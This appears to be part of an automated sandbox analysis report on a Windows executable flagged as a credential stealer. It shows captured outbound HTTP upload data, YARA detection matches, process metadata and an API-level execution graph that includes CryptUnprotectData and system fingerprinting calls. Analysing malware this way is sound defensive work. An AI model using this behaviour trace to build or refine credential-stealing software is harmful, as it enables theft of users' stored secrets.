                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2 fd 6f b5 a8 b0 ea 8b 78 8f 01 ea 75 1f b5 65 f8 6b fb 51 84 e7 6c 6a 22 ad a7 71 ab 7e df 24 44 80 15 d3 61 54 18 65 63 6e ac 6e 0f ac 34 2f ce
                                                                                                                                                                                                                                Data Ascii: pN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f|HHH"2,q|FQyD:vPQ}=/rh+sJg+.*zrti$-7:ivoxuekQlj"q~$DaTecnn4/
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a ea 5a 60 86 82 cb 93 77 50 d3 fb 9a 97 44 a4 c2 26 d5 88 33 22 57 50 32 1a c4 00 e8 ae 9d b7 ff 2c 0f 3b ad 36 6f 05 dd 9d 88 db 14 9b 9e 32 c0
                                                                                                                                                                                                                                Data Ascii: ZD7v{y5]x)&S=q{\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*Z`wPD&3"WP2,;6o2
                                                                                                                                                                                                                                2024-12-26 12:14:35 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:35 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=u7ihldhh1urmlsdnfjq4c3jo3q; expires=Mon, 21 Apr 2025 06:01:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBt%2FxouQpfDAKeajSgIaW%2Bb5FQ8NNGU8fTN4Vys9cO9a4q6vtUXS0dzgoraLyzfYhder59%2FEoTnBWFGL9cNfc0le0qfQRTCvvcHfplufDDViFJYAyfSxIPd2PIBx88GIpfQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fdc0de0c424d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1666&rtt_var=649&sent=340&recv=593&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573516&delivery_rate=1655328&cwnd=208&unsent_bytes=0&cid=843d6b1d9f872ec8&ts=2579&x=0"


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:07:14:09
                                                                                                                                                                                                                                Start date:26/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\MaZjv5XeQi.exe"
                                                                                                                                                                                                                                Imagebase:0x9a0000
                                                                                                                                                                                                                                File size:1'847'808 bytes
                                                                                                                                                                                                                                MD5 hash:20460F73DDD6DA12A34A1BC6911B0538
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209553671.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:54.8%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:65.1%
                                                                                                                                                                                                                                  Total number of Nodes:212
                                                                                                                                                                                                                                  Total number of Limit Nodes:18
                                                                                                                                                                                                                                  execution_graph 2124 9dc55c RtlAllocateHeap 1947 9d679f 1950 9d67bc 1947->1950 1949 9d682d 1950->1949 1951 9de110 LdrInitializeThunk 1950->1951 1951->1950 1952 9a9d1e 1953 9a9d40 1952->1953 1953->1953 1954 9a9d94 LoadLibraryExW 1953->1954 1955 9a9da5 1954->1955 1956 9a9e74 LoadLibraryExW 1955->1956 1957 9a9e85 1956->1957 2125 9aef53 2126 9aef5d CoInitializeEx 2125->2126 1958 9de40d 1960 9de484 1958->1960 1959 9ded6e 1960->1959 1962 9de110 LdrInitializeThunk 1960->1962 1962->1959 1963 9deb88 1965 9deba0 1963->1965 1964 9debde 1964->1964 1967 9dec4e 1964->1967 1969 9de110 LdrInitializeThunk 1964->1969 1965->1964 1970 9de110 LdrInitializeThunk 1965->1970 1969->1967 1970->1964 2127 9cd34a 2128 9cd370 2127->2128 2129 9cd3ea GetPhysicallyInstalledSystemMemory 2128->2129 2130 9cd410 2129->2130 2130->2130 1971 9a8600 1974 9a860f 1971->1974 1972 9a8a48 ExitProcess 1974->1972 1975 9de080 1974->1975 1976 9df970 1975->1976 1977 9de085 FreeLibrary 1976->1977 1977->1972 1978 9c1d00 1991 9e1320 1978->1991 1980 9c23f5 1982 9c1d43 1982->1980 1989 9c1de9 1982->1989 1995 9de110 LdrInitializeThunk 1982->1995 1983 9dc570 RtlFreeHeap 1984 9c239e 1983->1984 1984->1980 2001 9de110 LdrInitializeThunk 1984->2001 1986 9c2383 1986->1983 1987 9c245a 1986->1987 1989->1986 1996 9de110 LdrInitializeThunk 1989->1996 1997 9dc570 1989->1997 1993 9e1340 1991->1993 1992 9e145e 1992->1982 1993->1992 2002 9de110 LdrInitializeThunk 1993->2002 1995->1982 1996->1989 1998 9dc585 1997->1998 1999 9dc583 1997->1999 2000 9dc58a RtlFreeHeap 1998->2000 1999->1989 2000->1989 2001->1984 2002->1992 2003 9ae687 2004 9ae6a0 2003->2004 2009 9d9280 2004->2009 2006 9ae77a 2007 9d9280 5 API calls 2006->2007 2008 9ae908 2007->2008 2008->2008 2010 9d92b0 2009->2010 2011 9d954f SysAllocString 2010->2011 2015 9d98eb 2010->2015 2013 9d9574 2011->2013 2012 9d9916 GetVolumeInformationW 2016 9d9934 2012->2016 2014 9d957c CoSetProxyBlanket 2013->2014 2013->2015 2014->2015 2018 9d959c 2014->2018 2015->2012 2016->2006 2017 9d98d6 SysFreeString SysFreeString 2017->2015 2018->2017 2131 9e0340 2132 9e0360 2131->2132 2132->2132 2133 9e042f 2132->2133 2135 9de110 LdrInitializeThunk 2132->2135 2135->2133 2136 9ace45 2137 9ace4b 2136->2137 2138 9ace55 CoUninitialize 2137->2138 2139 9ace80 2138->2139 2140 9acc7a 2141 9acc86 2140->2141 2146 9c7440 2141->2146 2143 9acce6 2144 9c7440 2 API calls 2143->2144 2145 9acdac 2144->2145 2147 9c7460 2146->2147 2150 9c74ae 2147->2150 2154 9de110 LdrInitializeThunk 2147->2154 2148 9c7726 2148->2143 2150->2148 2153 9c756e 2150->2153 2155 9de110 LdrInitializeThunk 2150->2155 2151 9dc570 RtlFreeHeap 2151->2148 2153->2151 2153->2153 2154->2150 2155->2153 2019 9cd7bd 2020 9cd7ca GetComputerNameExA 2019->2020 2156 9ade73 2157 9aded0 2156->2157 2158 9adf1e 2157->2158 2160 9de110 LdrInitializeThunk 2157->2160 2160->2158 2022 9f9335 2023 9f9bdb VirtualAlloc 2022->2023 2024 9f9b94 2023->2024 2161 9c18f0 2162 9c18fe 2161->2162 2164 9c1950 2161->2164 2162->2162 2165 9c1a10 2162->2165 2166 9c1a20 2165->2166 2166->2166 2167 9e14b0 LdrInitializeThunk 2166->2167 2168 9c1b0f 2167->2168 2025 9a9eb7 2026 9dfe00 2025->2026 2027 9a9ec7 WSAStartup 2026->2027 2028 9cc8b1 2029 9cc8b0 2028->2029 2029->2028 2031 9cc8be 2029->2031 2034 9de110 LdrInitializeThunk 2029->2034 2033 9de110 LdrInitializeThunk 2031->2033 2033->2031 2034->2031 2169 9aec77 2170 9aec8f CoInitializeSecurity 2169->2170 2171 9cd7ee 2172 9cd7f5 FreeLibrary 2171->2172 2174 9cdbc9 2172->2174 2174->2174 2175 9cdc30 GetComputerNameExA 2174->2175 2176 9aa369 2177 9aa430 2176->2177 2177->2177 2180 9ab100 2177->2180 2179 9aa479 2183 9ab190 2180->2183 2181 9ab1b5 2181->2179 2183->2181 2184 9de0a0 2183->2184 2185 9de0c0 2184->2185 2186 9de0f3 2184->2186 2187 9de0d4 2184->2187 2190 9de0e8 2184->2190 2185->2186 2185->2187 2188 9dc570 RtlFreeHeap 2186->2188 2189 9de0d9 RtlReAllocateHeap 2187->2189 2188->2190 2189->2190 2190->2183 2035 9dea29 2037 9dea50 2035->2037 2036 9dea8e 2041 9de110 LdrInitializeThunk 2036->2041 2037->2036 2042 9de110 LdrInitializeThunk 2037->2042 2040 9deb59 2041->2040 2042->2036 2043 9d0b2b CoSetProxyBlanket 2192 9de967 2193 9de980 2192->2193 2196 9de110 LdrInitializeThunk 2193->2196 2195 9de9ef 2196->2195 2044 9b1227 2045 9b1241 2044->2045 2046 9b14e5 RtlExpandEnvironmentStrings 2045->2046 2048 9af444 2045->2048 2047 9b1562 2046->2047 2047->2048 2050 9b57c0 2047->2050 2051 9b57e0 2050->2051 2051->2051 2052 9e1320 LdrInitializeThunk 2051->2052 2053 9b58ed 2052->2053 2056 9b5ae8 2053->2056 2059 9b5b92 2053->2059 2065 9b594e 2053->2065 2071 9b5cad 2053->2071 2079 9e1720 2053->2079 2056->2065 2086 9de110 LdrInitializeThunk 2056->2086 2058 9e1720 LdrInitializeThunk 2058->2071 2059->2059 2060 9e1320 LdrInitializeThunk 2059->2060 2060->2071 2063 9b60f1 2070 9b66be 2063->2070 2073 9b634d 2063->2073 2064 9b60b5 CryptUnprotectData 2064->2063 2064->2065 2064->2071 2065->2048 2067 9b731b 2068 9b68eb 2068->2068 2089 9de110 LdrInitializeThunk 2068->2089 2072 9b6792 2070->2072 2087 9de110 LdrInitializeThunk 2070->2087 2071->2058 2071->2063 2071->2064 2071->2065 2085 9de110 LdrInitializeThunk 2071->2085 2072->2068 2088 9de110 LdrInitializeThunk 2072->2088 2073->2065 2075 9e14b0 2073->2075 2076 9e14d0 2075->2076 2077 9e15fe 2076->2077 2090 9de110 LdrInitializeThunk 2076->2090 2077->2073 2080 9e1750 2079->2080 2083 9e17a9 2080->2083 2091 9de110 LdrInitializeThunk 2080->2091 2081 9b593f 2081->2056 2081->2059 2081->2065 2081->2071 2083->2081 2092 9de110 LdrInitializeThunk 2083->2092 2085->2071 2086->2070 2087->2072 2088->2068 2089->2067 2090->2077 2091->2083 2092->2081 2093 9dc5a0 2094 9dc5d0 2093->2094 2096 9dc62e 2094->2096 2101 9de110 LdrInitializeThunk 2094->2101 2096->2096 2098 9dc801 2096->2098 2100 9dc749 2096->2100 2102 9de110 LdrInitializeThunk 2096->2102 2097 9dc570 RtlFreeHeap 2097->2098 2100->2097 2101->2096 2102->2100 2103 9d8ea0 2104 9d8ec5 2103->2104 2107 9d8fc9 2104->2107 2112 9de110 LdrInitializeThunk 2104->2112 2106 9d9210 2107->2106 2109 9d90e1 2107->2109 2111 9de110 LdrInitializeThunk 2107->2111 2109->2106 2113 9de110 LdrInitializeThunk 2109->2113 2111->2107 2112->2104 2113->2109 2114 9e0d20 2115 9e0d2f 2114->2115 2119 9e0e98 2115->2119 2122 9de110 LdrInitializeThunk 2115->2122 2116 9e114b 2118 9dc570 RtlFreeHeap 2118->2116 2119->2116 2120 9e108e 2119->2120 2123 9de110 LdrInitializeThunk 2119->2123 2120->2118 2122->2119 2123->2120 2202 9e0460 2203 9e0480 2202->2203 2205 9e04ce 2203->2205 2210 9de110 LdrInitializeThunk 2203->2210 2205->2205 2207 9e06dd 2205->2207 2209 9e05af 2205->2209 2211 9de110 LdrInitializeThunk 2205->2211 2206 9dc570 RtlFreeHeap 2206->2207 2209->2206 2210->2205 2211->2209 2212 9f9fe0 VirtualAlloc

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_00AAC0AA 1 Function_009D679F 9 Function_009DE110 1->9 2 Function_009CC09E 3 Function_009A9D1E 4 Function_009D6095 5 Function_009CBE95 6 Function_009A4B10 7 Function_009AA091 8 Function_009C1A10 30 Function_009E14B0 8->30 10 Function_009DE40D 10->9 11 Function_00C1A0D3 12 Function_009DEB88 12->9 13 Function_009ABE0F 14 Function_009A8600 21 Function_009DE080 14->21 15 Function_009AB100 35 Function_009DE0A0 15->35 16 Function_009A8080 17 Function_00ADA0B6 18 Function_009C1D00 18->9 39 Function_009E1320 18->39 62 Function_009DC570 18->62 19 Function_009AE687 20 Function_009D9280 19->20 22 Function_009BC085 23 Function_009FC081 24 Function_009CD7BD 25 Function_009DDCBF 26 Function_00A58087 27 Function_009F9335 28 Function_009CC8B1 28->9 29 Function_009A9EB7 30->9 31 Function_009DEA29 31->9 32 Function_009D0B2B 33 Function_009AC1A0 34 Function_009B1227 52 Function_009B57C0 34->52 35->62 36 Function_009DC5A0 36->9 36->62 37 Function_009D8EA0 37->9 38 Function_009E0D20 38->9 38->62 39->9 40 Function_009E1720 40->9 41 Function_009DC55C 42 Function_009AC4D9 43 Function_009D4E58 44 Function_009D10DA 45 Function_009AEF53 46 Function_009DE051 47 Function_009D2753 48 Function_009CD84E 49 Function_009DE34B 50 Function_009CD34A 51 Function_009D0ACA 52->9 52->30 52->39 52->40 53 Function_009C7440 53->9 53->62 54 Function_009E0340 54->9 55 Function_009D48C2 56 Function_009ACE45 72 Function_009AB7E0 56->72 57 Function_009ABBC5 58 Function_009D087D 59 Function_009ACC7A 59->53 60 Function_009ADE73 60->9 61 Function_009C18F0 61->8 63 Function_009AEC77 64 Function_009D3670 65 Function_009CD7EE 66 Function_009AA369 66->15 67 Function_009AEBE9 68 Function_009D28EB 69 Function_009AC6ED 70 Function_009ABFED 71 Function_009DE967 71->9 73 Function_009A9F66 74 Function_009DE760 74->9 75 Function_009E0460 75->9 75->62 76 Function_009AC464 77 Function_009F9FE0

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 009B57C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                  • API String ID: 0-510280711
                                                                                                                                                                                                                                  • Opcode ID: 080772316a9e7f894a69b248f800a0b7f42901b6ed463d74add844723d3f1b71
                                                                                                                                                                                                                                  • Instruction ID: 288f7ec27c7426ba10c4e4044693701483b0ae1a0500951876f488dafcf9e685
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 080772316a9e7f894a69b248f800a0b7f42901b6ed463d74add844723d3f1b71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2C228B16083508FD7248F24D8927ABB7E6FFD6324F19893CE4D98B295D7349901CB92
                                                                                                                                                                                                                                  Function 009C1D00 Relevance: 26.8, Strings: 21, Instructions: 506COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 369 9c1d00-9c1d48 call 9e1320 372 9c1d4e-9c1db8 call 9b4c70 call 9dc540 369->372 373 9c2449-9c2459 369->373 378 9c1dba-9c1dbd 372->378 379 9c1dbf-9c1dd4 378->379 380 9c1dd6-9c1dda 378->380 379->378 381 9c1ddc-9c1de7 380->381 382 9c1dee-9c1e05 381->382 383 9c1de9 381->383 385 9c1e0c-9c1e17 382->385 386 9c1e07-9c1e95 382->386 384 9c1ea8-9c1eab 383->384 390 9c1ead 384->390 391 9c1eaf-9c1eb4 384->391 388 9c1e19-9c1e89 call 9de110 385->388 389 9c1e97-9c1e9c 385->389 386->389 397 9c1e8e-9c1e93 388->397 393 9c1e9e 389->393 394 9c1ea0-9c1ea3 389->394 390->391 395 9c1eba-9c1eca 391->395 396 9c2392-9c23c7 call 9dc570 391->396 393->384 394->381 398 9c1ecc-9c1ee9 395->398 403 9c23c9-9c23cc 396->403 397->389 401 9c1eef-9c1f13 398->401 402 9c207b-9c2083 398->402 405 9c1f17-9c1f1a 401->405 404 9c2085-9c2088 402->404 406 9c23ce-9c23e3 403->406 407 9c23e5-9c23eb 403->407 408 9c208a-9c208e 404->408 409 9c2090-9c20a1 call 9dc540 404->409 410 9c1f1c-9c1f31 405->410 411 9c1f33-9c1f4d call 9c2460 405->411 406->403 413 9c23ed-9c23f3 407->413 414 9c20b5-9c20b7 408->414 428 9c20b1-9c20b3 409->428 429 9c20a3-9c20ac 409->429 410->405 411->402 422 9c1f53-9c1f7c 411->422 417 9c23f5 413->417 418 9c23f7-9c2409 413->418 420 9c20bd-9c20e0 414->420 421 9c2358-9c2363 414->421 425 9c2447 417->425 426 9c240d-9c2413 418->426 427 9c240b 418->427 430 9c20e2-9c20e5 420->430 423 9c2365-9c2375 421->423 424 9c2367-9c236f 421->424 433 9c1f7e-9c1f81 422->433 435 9c2377 423->435 424->435 425->373 436 9c243b-9c243e 426->436 437 9c2415-9c2437 call 9de110 426->437 427->436 428->414 438 9c2379-9c237d 429->438 431 9c211a-9c2157 430->431 432 9c20e7-9c2118 430->432 439 9c215b-9c215e 431->439 432->430 440 9c1fae-9c1fc5 call 9c2460 433->440 441 9c1f83-9c1fac 433->441 435->438 444 9c2440 436->444 445 9c2442-9c2445 436->445 437->436 438->398 443 9c2383-9c2388 438->443 446 9c2177-9c217f 439->446 447 9c2160-9c2175 439->447 457 9c1fd4-9c1feb 440->457 458 9c1fc7-9c1fcf 440->458 441->433 453 9c238e-9c2390 443->453 454 9c245a 443->454 444->425 445->413 451 9c2181-9c218c 446->451 447->439 455 9c218e 451->455 456 9c2193-9c21aa 451->456 453->396 460 9c2259-9c2260 455->460 461 9c21ac-9c2246 456->461 462 9c21b1-9c21be 456->462 463 9c1fed 457->463 464 9c1fef-9c2079 call 9a7f50 call 9b48c0 call 9a7f60 457->464 458->404 465 9c2266-9c2289 460->465 466 9c2262 460->466 468 9c2248-9c224d 461->468 462->468 469 9c21c4-9c223a call 9de110 462->469 463->464 464->404 471 9c228b-9c228e 465->471 466->465 474 9c224f 468->474 475 9c2251-9c2254 468->475 478 9c223f-9c2244 469->478 476 9c22ed-9c2301 471->476 477 9c2290-9c22eb 471->477 474->460 475->451 481 9c2333-9c2336 476->481 482 9c2303-9c2307 476->482 477->471 478->468 484 9c2338-9c2345 call 9dc570 481->484 485 9c2347-9c2349 481->485 483 9c2309-9c2310 482->483 488 9c2320-9c2323 483->488 489 9c2312-9c231e 483->489 487 9c234b-9c234e 484->487 485->487 487->421 493 9c2350-9c2356 487->493 494 9c232b-9c2331 488->494 495 9c2325 488->495 489->483 493->438 494->481 495->494
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                  • API String ID: 0-1565257739
                                                                                                                                                                                                                                  • Opcode ID: c2ed1bd8334f726353fda2de670280ebc7efb88cd23b9750e58c04cbbf17c230
                                                                                                                                                                                                                                  • Instruction ID: ff3446387a4803cc10193d6b1e9fdac1030e4539fb3f22a2d73eb0600ead991b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2ed1bd8334f726353fda2de670280ebc7efb88cd23b9750e58c04cbbf17c230
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D228B7190C7808FD324DB28C485B6FBBE1AB86314F188D6EE4D987392D7B99845CB47
                                                                                                                                                                                                                                  Function 009D9280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
